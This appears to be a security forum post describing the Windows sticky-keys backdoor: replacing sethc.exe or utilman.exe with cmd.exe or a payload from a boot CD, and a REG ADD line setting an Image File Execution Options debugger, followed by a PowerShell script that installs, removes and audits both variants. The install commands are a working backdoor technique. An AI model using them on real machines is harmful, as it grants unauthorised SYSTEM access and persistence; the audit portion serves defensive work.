Physical access -> bootcd -> change .exe -> 0wned
If you have physical access to a Windows 7 box, you can still replace the binary c:\windows\system32\sethc.exe with cmd.exe (or a meterpreter payload) and trigger it by pressing the Shift key five times at the login screen. The shell you get runs as SYSTEM, because it is spawned from the secure desktop before anyone has logged on.
This also works by replacing c:\windows\system32\utilman.exe and pressing WINKEY-U at the login screen. Boot from a CD (or any other OS) to change the files: the running system will not let you overwrite them, since they are owned by TrustedInstaller, and the offline swap only works if the disk is not encrypted (BitLocker or similar).
....
You can also achieve the same result without touching the file at all by setting an executable of your choice as the Debugger for sethc.exe under Image File Execution Options in the registry: Windows then launches the "debugger" in place of the original binary, with the original command line appended (cmd.exe simply ignores it). So, in a privileged (elevated) command shell, it would be:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
The same goes for Utilman.exe (use the ...\Image File Execution Options\utilman.exe key). Note that this variant already requires admin rights, so it is a persistence trick rather than a way in, and it leaves a plain REG_SZ value that any IFEO audit will find.
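The following PowerShell is an added example, not code from the original post. It wraps the REG ADD trick above in a function that works for any of the accessibility binaries reachable from the logon screen, and adds the check a defender (or a tester cleaning up after an engagement) wants: an audit that flags both the IFEO Debugger variant and the file-swap variant. The function names, the list of binaries beyond sethc.exe and utilman.exe, and the OriginalFilename comparison are my own assumptions; run it from an elevated PowerShell 3.0 or later.

```powershell
# Added example (not from the original post). Sets, removes and audits the
# accessibility-binary backdoors described above. Function and parameter
# names are my own; nothing here is part of the post's own commands.

$IfeoRoot = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

# Binaries that can be launched from the logon screen: sethc.exe (Shift x5),
# utilman.exe (Win+U), the rest through the Ease of Access menu. Assumed list.
$AccessibilityBinaries = 'sethc.exe', 'utilman.exe', 'osk.exe',
                         'narrator.exe', 'magnify.exe', 'displayswitch.exe'

function Set-IfeoDebugger {
    # Equivalent of the post's REG ADD line, for any target binary.
    param(
        [Parameter(Mandatory)][string]$Target,
        [string]$Debugger = "$env:SystemRoot\System32\cmd.exe"
    )
    $key = Join-Path $IfeoRoot $Target
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    New-ItemProperty -Path $key -Name Debugger -PropertyType String `
                     -Value $Debugger -Force | Out-Null
}

function Remove-IfeoDebugger {
    # Cleanup: drop the Debugger value but leave any other IFEO settings alone.
    param([Parameter(Mandatory)][string]$Target)
    $key = Join-Path $IfeoRoot $Target
    if (Test-Path $key) {
        Remove-ItemProperty -Path $key -Name Debugger -ErrorAction SilentlyContinue
    }
}

function Find-AccessibilityBackdoor {
    # Audit every accessibility binary for both variants of the backdoor.
    foreach ($bin in $AccessibilityBinaries) {
        $path = Join-Path "$env:SystemRoot\System32" $bin
        $key  = Join-Path $IfeoRoot $bin
        $dbg  = (Get-ItemProperty -Path $key -Name Debugger -ErrorAction SilentlyContinue).Debugger
        $sig  = Get-AuthenticodeSignature -FilePath $path
        $orig = (Get-Item $path).VersionInfo.OriginalFilename

        # A cmd.exe copied over sethc.exe still carries a valid Microsoft
        # signature, so the signature check alone misses the swap; the embedded
        # OriginalFilename ("Cmd.Exe") gives it away. An unsigned payload such as
        # a meterpreter binary fails the signature check instead. Assumes each
        # genuine binary's OriginalFilename starts with its own base name.
        $baseName = [IO.Path]::GetFileNameWithoutExtension($bin)
        $swapped  = ($sig.Status -ne 'Valid') -or ($orig -notlike "$baseName*")

        [pscustomobject]@{
            Binary       = $bin
            IfeoDebugger = $dbg
            Signature    = $sig.Status
            OriginalName = $orig
            Suspicious   = [bool]$dbg -or $swapped
        }
    }
}

# Usage (elevated shell):
#   Set-IfeoDebugger -Target sethc.exe        # what the post's REG ADD line does
#   Set-IfeoDebugger -Target utilman.exe
#   Find-AccessibilityBackdoor | Format-Table -AutoSize
#   Remove-IfeoDebugger -Target sethc.exe     # cleanup after testing
```

The audit deliberately checks two independent things per binary: the registry value (which catches the IFEO variant even when the file on disk is untouched) and the file's own signature plus version resource (which catches the boot-CD swap, where the registry is clean). Run both sides on a known-good machine first to confirm the expected OriginalFilename values for your Windows build before relying on the `Suspicious` column.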